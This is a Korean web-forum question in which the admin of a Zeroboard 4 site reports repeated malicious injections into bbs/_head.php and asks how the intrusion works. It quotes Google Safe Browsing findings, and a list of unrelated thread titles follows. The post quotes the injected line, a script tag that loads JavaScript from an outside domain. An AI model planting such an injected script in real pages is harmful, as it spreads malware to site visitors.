묻고답하기

인터넷을 많이 뒤져봤는데 뚜렷한 해결책을 못찾아서 여기에 질문을 올려봅니다.
(이미 해결책이 있는데 제가 잘 이해를 못한 것일 수도 있고요)


현재 제로보드4 버전을 사용해서 운영중인 홈페이지가 있습니다.

그런데 계속 악성코드가 삽입되어서 골머리를 썩고 있습니다.


bbs/_head.php 라는 파일의 가장 마지막줄에

<?ob_start();?><script src="http://www.wsart.net/bbs/data/js/common.js></script>

라는 내용이 삽입되어서

_head.php를 인클루드하고 있는 모든 페이지들이

영향을 받고 있습니다.

script태그의 src 내용은 매번 바뀝니다.


구글의 안전브라우징 진단검사는 아래와 같습니다.

Google이 사이트를 방문했을 때의 결과

지난 90일간 진행된 사이트 테스트에서 68개의 페이지 가운데 8개에서 사용자 동의 없이 악성 소프트웨어가 다운로드 및 설치된 것으로 확인되었습니다. Google이 사이트에 마지막으로 방문한 것은 2011-04-10이며, 의심되는 콘텐츠가 마지막으로 발견된 것은 2011-04-10입니다.

Malicious software includes 3 scripting exploit(s), 3 exploit(s). Successful infection resulted in an average of 4 new process(es) on the target machine.

wkmg.co.kr/sporam.com/을(를) 포함한 2개의 도메인에서 악성 소프트웨어를 호스팅하고 있습니다.

interbar.co.kr/을(를) 비롯한 1개의 도메인이 이 사이트 방문자에게 악성코드를 유포하는 중개 역할을 한 것으로 나타났습니다.

This site was hosted on 1 network(s) including AS3786 (ERX).



혹시 이 취약점이 어떤 방식으로 해서 들어오는것인지

그리고 해결법을 알고 계신분 있으신가요???
글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
야마돌끼 모듈등록 질문입니다!  
je313 board다운로드후 게시판 모듈등록하기가 안됩니다. [1] 2013.03.12 by clov
kingmaya 동창회 홈페이지에서 개인정보 수정한 회원이 누구인지 관리자가 알수 있는 방법이 있을까요.  
대권 모바일은 스크랩, 저장함, 작성글보기,친구보기 ..등이 원래없나요?  
미추어버리겠네 팝업관련입니다.ㅠㅠ  
Seoooong 확장변수 페이지가 나오질 않아요. [1] file 2013.03.12 by sejin7940
je313 제로보드 xe 사용방법좀 알려주세요 [1] 2013.03.12 by sejin7940
오락실주인 이번 XE1.7 버젼 검색창 수정 [헬프미] [1] file 2013.03.12 by OEZ
SEAN76 관리자 페이지 error [1] 2013.03.12 by OEZ
곰사탕 외부페이지를 불러왔을 때 스크립트가 안나옵니다. [1] 2013.03.12 by OEZ
지난해11월 카테고리에 공지글 등록 할 수 있나요?(재등록 죄송합니다) [2] 2013.03.12 by 지난해11월
nugul 왜 글이 보였다 안보였다 할까요?  
암지 포인트 선물모듈...  
궁금궁금궁금이 IP 입력 문의  
망고좋아 회원그룹별 보기  
Zeebada 댓글 권한 설정에 대하여  
david7 관리자 페이지 접속 오류입니다 (고수님들 도와주세요) [1] 2013.03.11 by david7
친절뺀질이 XE DB관련 문의입니다.  
맨발의심봉이 Warning: require(/var/www/html/customPages/_cache/connectedUsers/index.php) [function.require]: failed to open stream: No such file or directory in F:\play10\classes\template\TemplateHandler.class.php(211) : eval()'d code on line 36 이렇게 나옵니다..  
withover 1.4 -> 1.7 로 업데이트 가능한가요?